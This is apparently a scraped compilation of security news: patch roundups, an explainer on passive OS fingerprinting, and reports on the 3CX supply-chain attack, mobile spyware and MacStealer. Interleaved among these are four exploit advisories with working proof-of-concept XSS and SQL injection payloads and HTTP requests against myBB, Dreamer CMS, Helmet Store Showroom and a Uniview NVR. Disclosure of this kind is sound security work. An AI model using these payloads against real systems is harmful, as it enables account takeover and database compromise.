Plus: Microsoft Outlook and Android patch serious flaws, Chrome and Firefox get fixes, and much more.

Meanwhile, researchers at Google’s Project Zero have reported 18 zero-day vulnerabilities in Exynos Modems made by Samsung. The four most severe—CVE-2023-24033, CVE-2023-26496, CVE-2023-26497, and CVE-2023-26498—allow internet-to-baseband remote code execution, the researchers wrote in a blog. “Tests conducted by Project Zero confirm that the four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim’s phone number,” they wrote. 

Affected devices include those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12, and A04 series, as well as Google’s Pixel 6 and Pixel 7 series.

Patch timelines will vary per manufacturer, but affected Pixel devices have received a fix for all four of the severe internet-to-baseband remote code execution vulnerabilities. In the meantime, users with affected devices can protect themselves by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, Google said.

Google Chrome 

Google has released Chrome 111 of its popular browser, fixing eight security flaws, seven of which are memory safety bugs with a high severity rating. Four use-after-free vulnerabilities include a high-severity issue tracked as CVE-2023-1528 in Passwords and CVE-2023-1529, an out-of-bounds memory access flaw in WebHID.

Meanwhile, CVE-2023-1530 is a use-after-free bug in PDF reported by the UK’s National Cyber Security Centre, and CVE-2023-1531 is a high-severity use-after-free vulnerability in ANGLE.

None of the issues are known by Google to have been used in attacks, but given their impact, it makes sense to update Chrome when you can.

Cisco

Enterprise software giant Cisco has published the twice-yearly security bundle for its IOS and IOS XE Software, fixing 10 vulnerabilities. Six of the issues fixed by Cisco are rated as having a high impact, including CVE-2023-20080, a denial of service flaw, and CVE-2023-20065, a privilege escalation bug.

At the start of the month, Cisco fixed multiple vulnerabilities in the web-based management interface of some Cisco IP Phones that could allow an unauthenticated, remote attacker to execute arbitrary code or cause denial of service. With a CVSS score of 9.8, the worst is CVE-2023-20078, a vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 series multiplatform phones. 

An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface, Cisco said, adding, “A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device.”

Firefox

Privacy-conscious developer Mozilla has released Firefox 111, fixing 13 vulnerabilities, seven of which are rated as having a high impact. These include three flaws in Firefox for Android, including CVE-2023-25749, which may have resulted in third-party apps opening without a prompt.

Meanwhile, two memory safety bugs, CVE-2023-28176 and CVE-2023-28177, have been fixed in Firefox 111. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla said.

SAP

It’s another month of big updates for software maker SAP, which has released 19 new security notes in its March Security Patch Day guidance. Issues fixed during the month include four with a CVSS score of over 9. 

One of the worst of these is CVE-2023-25616, a code injection vulnerability in SAP Business Objects Business Intelligence Platform. This vulnerability in the Central Management Console allows an attacker to inject arbitrary code with a “strong negative impact” on the integrity, confidentiality, and availability of the system, security firm Onapsis said.

Finally, with a CVSS score of 9.9, CVE-2023-23857 is an improper access control bug in SAP NetWeaver AS for Java. “The vulnerability allows an unauthenticated attacker to attach to an open interface and make use of an open naming and directory API to access services,” Onapsis said.

Apple's iOS 16.4: Security Updates Are Better Than a Goose Emoji

Network protocols can be used to identify operating systems and discern other device information.

Network security and asset management products have to be able to identify what operating systems are currently running in the organization. With this information, IT and security departments gain greater visibility and control over their networks.

Device and operating system information is trivial to collect if the device has a software agent installed. However, agents are not an option for some operating systems, especially those installed on embedded and Internet of Things devices. This is where passive OS fingerprinting comes in handy, since passive methods don't require installing software on devices and work for most operating systems. Passive OS fingerprinting involves matching uniquely identifying patterns in the host's network traffic and classifying the traffic accordingly. Several protocols from different network layers can be used for OS fingerprinting: MAC addresses, TCP/IP parameters, HTTP User-Agent strings, and DHCP requests.

The Open Systems Interconnection (OSI) model contains several protocols for the application, transport, network, and data link layers. As a rule of thumb, protocols at the lower levels of the OSI stack — such as MAC and IP — provide better reliability with lower granularity compared with those on the upper levels of stack, and vice versa. Let's start at the bottom of the stack and move up.

**Start at the MAC Address**

The medium access control (MAC) protocol uses a unique physical identifier hardcoded into the device during manufacturing. The 12-digit hexadecimal number — the MAC address — is commonly written out as six pairs divided by hyphens. The left most six-digit long string represents the manufacturer's unique identifier and the right most six represent the serial number of the device's network interface card. For example, the six left-most digits of a MacBook laptop's MAC address would be 88:66:5a, which is the string affiliated with Apple.

By looking at the manufacturer's unique identifier, network administrators can infer the type of device running in the network and, in some cases, even the operating system.

**TCP/IP Tells Tales**

The TCP/IP stack is a more granular source of information. Most operating systems set unique values in the parameters within the packet headers, making it possible to identify the OS by looking at these values. Some of the most common parameters used in OS fingerprinting are initial time to live (TTL), Windows Size, "Don't Fragment" flag, and TCP options (values and order). For example, if a device has an outgoing packet's IP header with the "Don't fragment" flag set, TTL with the value of 64, Windows size of 65535, and a specific set of TCP options (02, 01, 03, 01, 01, 08, 04, 00), that's enough to identify it as running MacOS.

**HTTP Has a Wealth of Info**

Several protocols in the application layer are also useful for identifying the device's operating system type and the exact version or distribution. In some cases, these fields can be configured by the user and, thus, are less reliable.

The most common application protocol used in OS fingerprinting is HTTP, via the header's User-Agent field. The field, added by the application (such as a Web browser), includes information such as the application, operating system, and underlying device of the client. For example, the HTTP request to the server could contain a User-Agent field that identifies the client as a Firefox browser running on a Windows 7 OS: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0.

The User-Agent field is not the only indicator the HTTP protocol contains. Most operating systems have a built-in connectivity test that automatically runs when the device connects to a public network. For example, Network Connectivity Status Indicator (NCSI), an Internet connection awareness protocol in Microsoft's Windows operating systems, consists of a sequence of specifically crafted DNS and HTTP requests and responses that indicate if the host is located behind a captive portal or a proxy server.

**DHCP Identifies Hosts**

The DHCP protocol, used for IP assignment over the network, provides several indicators that can be used to identify the host. DHCP is composed of 4 steps: discovery, offer, request, and acknowledge (DORA). For example, a Windows host broadcasting DHCP messages over the local network and receiving replies from the DHCP server will be sending a unique vendor class identifier "MSFT 5.0," and the parameter request list would contain a sequence of values common to Windows hosts.

Combined with the order of the DHCP options themselves, the indicators are sufficient to identify the host as a Windows OS.

**Wrapping Up**

While some protocols provide better accuracy than others, there is no "silver bullet" for the task of OS identification, and the different options provide different types of information. Rather than fingerprinting based on a single protocol, you might consider a multiprotocol approach, such as combining the HTTP User-Agent with lower-level TCP options.

How to Solve IoT's Identity Problem

myBB forums version 1.8.26 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)   
# Exploit Author: Andrey Stoykov  
# Software Link: https://mybb.com/versions/1.8.26/  
# Version: 1.8.26  
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =  
"Global Templates"=20  
3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=  
late HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing

// HTTP redirect response to specific template

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=  
=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1  
[...]

// HTTP GET request to newly created template

GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

<tr class=3D"first">  
<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=  
n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=  
E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>  
[...]

Stored XSS #2:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Management"  
3. Select "Add New Forum" and enter payload "><script>alert(1)</script>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=  
/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=  
lert(1)</script>&description=3D"><script>alert(2)</script[...]

// HTTP response showing successfully added a new forum

HTTP/1.1 200 OK  
Date: Sun, 20 Nov 2022 11:00:28 GMT  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forums

GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<small>Sub Forums:  <a href=3D"index.php?module=3Dforum-management&fid=  
=3D3">"><script>alert(1)</script></a></small>

Stored XSS #3:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Announcements"  
3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=  
TTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=  
2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=  
r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=  
(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1

// HTTP response showing successfully added an anouncement

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forum URL

GET /mybb_1826/ HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=  
</a>

--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

myBB forums 1.8.26 Cross Site Scripting

Dreamer CMS version 4.0.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Dreamer CMS v4.0.0 - SQL Injection# Date: 2022/10/02 # Exploit Author: lvren# Vendor Homepage: http://cms.iteachyou.cc/# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip # Version: v4.0.0 # CVE: CVE-2022-43128Proof Of Concept:POST /admin/search/doSearch HTTP/1.1Host: localhost:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 80Origin: http://localhost:8888Connection: closeReferer: http://localhost:8888/admin/search/doSearchCookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739Upgrade-Insecure-Requests: 1entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386lvrenlvren@lvre.ntesmail.com签名由 网易灵犀办公 定制

Dreamer CMS 4.0.0 SQL Injection

Helmet Store Showroom version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Helmet Store Showroom v1.0 - SQL Injection# Exploit Author: Ameer Hamza# Date: November 15, 2022# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code# Tested on: Kali Linux, Apache, Mysql# Vendor: oretnom23# Version: v1.0# Exploit Description:# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.[+] The username parameter is vulnerable to SQLi in login page[+] URL --> http://localhost/hss/admin/login.php[+] Username = ' OR 1=1-- -HTTP REQUESTPOST /hss/classes/Login.php?f=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 38Origin: http://localhostConnection: closeReferer: http://localhost/hss/admin/login.phpCookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpausername='+OR+1%3D1+--+-&password=1234

Helmet Store Showroom 1.0 SQL Injection

Uniview NVR301-04S2-P4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)# Author: Bleron Rrustemi# Discovery Date: 2022-11-15# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/# Datasheet:: https://www.uniview.com/download.do?id=1761643# Device Firmware: NVR-B3801.20.15.200829# Tested Version: NVR301-04S2-P4# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)# Vulnerability Type: Reflected Cross-Site Scripting (XSS)# CVE: N/A  # Proof of Concept:IP=IP of the devicehttp://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>

Uniview NVR301-04S2-P4 Cross Site Scripting

By Deeba Ahmed
According to cybersecurity researchers, a nation-state actor, LABYRINTH CHOLLIMA, is suspected to be behind the multi-stage attack on 3CXDesktopApp.
This is a post from HackRead.com Read the original post: Popular PABX platform, 3CX Desktop App suffers supply chain attack

SentinelOne has dubbed the attack “Smooth Operator,” while CrowdStrike suspects the involvement of a North Korean government-state actor known as LABYRINTH CHOLLIMA.

CrowdStrike and SentinelOne cybersecurity researchers identified an unusual spike in malicious activity from a single, legitimate binary, 3CX Voice Over Internet Protocol (VOIP) desktop App (3CX Desktop App).

**Campaign Details**

On March 29, 2023, CrowdStrike researchers observed malicious activity, including beaconing to attacker-operated infrastructure, deploying second-stage payloads, and, in some cases, hands-on keyboard activity.

Since the app is available for Windows, macOS, and Linux, the activity was observed on Mac and Windows systems. Mobile versions are also available for Android and iOS devices. For browsers, the app is available as an extension for Chrome, and a browser-based version is available for the Progressive Web app.

Researchers suspect the involvement of a North Korean government-state actor, LABYRINTH CHOLLIMA. CrowdStrike Intelligence sent an alert to its customers yesterday morning. On the other hand, SentinelOne started seeing an uptick in 3CX Desktop App behaviour on March 22, 2023.

It is worth mentioning that SentinelOne has dubbed the attack “Smooth Operator.” The company urges customers to ensure that prevention policies are appropriately configured and that Suspicious Processes are activated to stay protected.

**Multi-Stage Attack Scenario**

In this multi-stage attack, the malicious 3CX Desktop App installer serves as a shellcode loader that executes the shellcode from heap space and loads a DLL after removing the “MZ” at the start.

This DLL is later called through the DllGetClassObject export. At this stage, icon files are downloaded from a specific GitHub repository: (github.com/IconStorages/images).

These ICO files append Base64 data at the end, which is then decoded and used to download the final stage. In this stage, info-stealer functionality is implemented, which includes collecting system and browser data. It can collect data from Chrome, Brave, Edge, and Firefox browsers, and the collected data includes browsing history from Chrome and Places tab data from Firefox.

**What is 3CXDesktopApp**

For your information, 3CX Desktop App is a widely-used voice and video conferencing and call routing software characterized as a Private Automatic Branch Exchange (PABX) platform.

The platform is used by 600,000 companies globally and has more than 12 million active users. Companies in the automobile, manufacturing, hospitality, food & beverage, and MSP (managed information technology provider) sectors commonly use it.

It is worth noting that PBX software is an attractive target for launching supply-chain attacks, as these allow attackers to monitor organizations’ communications and alter call routing and broker connections into external voice services.

**UPDATE:**

In a subsequent update, 3CX stated that the problem seemed to stem from a bundled library that was compiled into the Windows Electron app via git, and the company is currently conducting further investigations into the matter.

1.  PyPI Packages Drop Malware in New Supply Chain Attack
2.  News Corp’s software supply chain attack & cybersecurity
3.  SolarWinds supply chain attack affected 250 organizations
4.  Access:7 Supply Chain Flaws Impact ATMs and IoT devices

Popular PABX platform, 3CX Desktop App suffers supply chain attack

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.
"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls

Supply Chain / Software Security

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.

"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said.

The cybersecurity firm is tracking the activity under the name **SmoothOperator**, stating the threat actor registered a massive attack infrastructure as far back as February 2022.

3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American Express, BMW, Honda, Ikea, Pepsi, and Toyota, among others.

While the 3CX PBX client is available for multiple platforms, Sophos, citing telemetry data, pointed out that the attacks observed so far are confined to the Windows Electron client of the PBX phone system.

The infection chain, in a nutshell, takes advantage of the DLL side-loading technique to load a rogue DLL (ffmpeg.dll) that's designed to retrieve an icon file (ICO) payload. The GitHub repository hosting the file has since been taken down.

The information stealer is capable of gathering system information and sensitive data stored in Google Chrome, Microsoft Edge, Brave, and Mozilla Firefox browsers.

Cybersecurity firm CrowdStrike said it suspects the attack to be linked to a North Korean nation-state actor it tracks as Labyrinth Chollima (aka Nickel Academy), a sub-cluster within the notorious Lazarus Group.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

"The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity," CrowdStrike added.

In a forum post, 3CX's CEO Nick Galea said it's in the process of issuing a new build over the next few hours, and noted that Android and iOS versions are not impacted. "Unfortunately this happened because of an upstream library we use became infected," Galea said, without specifying more details.

In the interim, the company is urging its customers to uninstall the app and install it again, or alternatively use the PWA client.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

3CX Desktop App Targeted in Supply Chain Cyber Attack, Affecting Millions of Users

By Habiba Rashid
Google's Threat Analysis Group (TAG) labeled the spyware campaign as limited but highly targeted.
This is a post from HackRead.com Read the original post: Google reveals spyware attack on Android, iOS, and Chrome

The primary target of this spyware campaign were the unsuspecting users in Italy, Malaysia, and Kazakhstan.

Google’s Threat Analysis Group (TAG) has discovered two highly-targeted mobile spyware campaigns that use zero-day exploits to deploy surveillance software against iPhone and Android smartphone users.

Google TAG discovered two “distinct, limited, and highly targeted” campaigns aimed at users of Android, iOS, and Chrome on mobile devices. The campaigns used zero-day and n-day exploits, taking advantage of the period between when vendors release vulnerability fixes and when hardware manufacturers update end-user devices with those patches, creating exploits for unpatched platforms.

These discoveries highlight the importance of timely software patching by vendors and end-users to prevent malicious actors from exploiting known vulnerabilities. The campaigns also suggest that surveillance software vendors share exploits and techniques to enable the proliferation of potentially dangerous hacking tools.

The first campaign (CVE-2022-42856; CVE-2022-4135) targeted versions of iOS and Android before 15.1 and ARM GPU running Chrome versions before 106, respectively. The payload of the exploit in the first campaign included a simple stager that pinged back the GPS location of the device and allowed the attacker to install an .IPA file onto the affected handset, which can be used to steal information.

The campaign targeted both Android and iOS devices, with initial access attempts delivered via Bit.ly URL shorter links sent over SMS to users located in the following three countries:

1.  Italy
2.  Malaysia
3.  Kazakhstan.

The second campaign (CVE-2022-4262; CVE-2023-0266), which included a complete exploit chain using both zero-days and n-days, targeted the latest version of the Samsung Internet browser.

The payload of the exploit in the second campaign was a C++-based, “fully-featured Android spyware suite” that included libraries for decrypting and capturing data from various chat and browser applications.

Google researchers suspect that the actor involved may be a customer, partner, or otherwise close affiliate of Variston, a commercial spyware vendor.

It is worth noting that as reported by Hackread.com last year, Variston is a Barcelona-based company that Google TAG exposed for exploiting n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender while posing as a custom cybersecurity solutions provider.

An example screenshot from one of the malicious websites targeting users in Italy (Credit: Google)

TAG actively tracks commercial spyware vendors, with more than 30 currently under observation, and identifies exploits or surveillance capabilities sold to state-sponsored actors. These dangerous hacking tools arm governments with surveillance capabilities they would not be able to develop in-house.

These tools, including spyware, are often used to target dissidents, journalists, human rights workers, and opposition-party politicians, posing life-threatening risks.

Although the use of surveillance technology is generally legal under most national or international laws, governments have abused these laws and technologies to target individuals who do not align with their agendas.

Regulators and vendors alike have been cracking down on the production and use of commercial spyware since the revelation of governments abusing NSO Group’s Pegasus mobile spyware to target iPhone users came under international scrutiny.

On March 28, the Biden administration issued an executive order that restricts the use of commercial surveillance tools by the federal government, but Google’s findings show that these efforts have not thwarted the commercial-spyware scene.

It is imperative that regulations governing the production and use of commercial spyware be strengthened to ensure that they are not used to target individuals in violation of their fundamental rights.

The discoveries demonstrate that those creating the exploits are keeping a close eye on vulnerabilities they can exploit for nefarious purposes and are likely colluding to maximize the potential for using them to compromise targeted devices.

1.  Google cracks down on sites with ties to hack-for-hire groups
2.  Israeli Spyware Vendor Use Chrome 0day to Target Journalists
3.  ISPs Helping Attackers Install Hermit Spyware on Smartphones
4.  Malware vendor returns with yet another nasty Android malware
5.  European Spyware Vendor Offer Android and iOS Device Exploits

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Google reveals spyware attack on Android, iOS, and Chrome

By Deeba Ahmed
The new MacStealer malware is being advertised on a notorious Russian hacker and cybercrime forum.
This is a post from HackRead.com Read the original post: Beware of MacStealer: A New Malware Targeting macOS Catalina Devices

MacStealer steals extensive data from a targeted device, including personal data, iCloud Keychain data, images, passwords, and credit card details.

If your device runs on macOS Catalina, be cautious because a new malware has surfaced dubbed MacStealer, which mainly targets Catalina-running Mac devices and infects both Apple Silicon and Intel chips.

**MacStealer steals a wide range of user data**

Security researchers at Uptycs discovered MacStealer and observed that it steals extensive data from the device, including personal data, iCloud Keychain data, images, passwords, and credit card details.

Furthermore, the malware can steal browser cookies, documents, and login details from the targeted Mac. It works specifically on MacOS Catalina-based Macs. The malware steals cookies and credentials from Google Chrome, Firefox, and Brave browsers along with extracting the Keychain database.

Moreover, it can obtain several file types, such as text files, MP3s, photographs, PowerPoint files, and databases.

**How Does the Attack Take Place?**

The attack starts by taking the Keychain wholesale without accessing its data. The stolen database is transmitted to the attacker via Telegram in encrypted form. A separate ZIP folder is also shared with the attacker through a Telegram bot.

The malware developer, who is selling access to MacStealer for $100 per build, claims that the extracted Keychain cannot be accessed without the master password.

The developer has provided a list of upcoming features of MacStealer, which includes stealing funds from cryptocurrency wallets, a dedicated tool for creating new builds, a custom uploader, a reverse shell, and a control panel. The upcoming versions may also feature the capability to steal data from the Safari browser and Apple Notes.

This is what the MacStealer malware developer has to say on a Russian hacker forum (Image credit: Uptycs)

**How to Stay Safe?**

Researchers couldn’t identify how MacStealer moves between Macs. Initial infections were caused by the weed.dmg app, which bears the icon of a leaf and appears as an executable. When this file is opened, it displays a fake macOS password prompt.

(Image credit: Uptycs)

It is worth noting that this prompt isn’t the same as the genuine macOS password prompt. If the user enters credentials, the tool can access other documents on the device. Therefore, if you are an experienced Mac user, it would be easier to identify this difference.

Keep your Mac device updated and patched, and only download/install files from trusted sources, such as the App Store.

1.  5 macOS Monterey Issues You Need to Fix
2.  macOS Hit By New “Alchimist” Attack Framework
3.  macOS Users hit by Chinese Iron Tiger APT Group
4.  DazzleSpy infects macOS through hacked websites
5.  Multi-platform SysJoker backdoor hits macOS devices

Tag

#firefox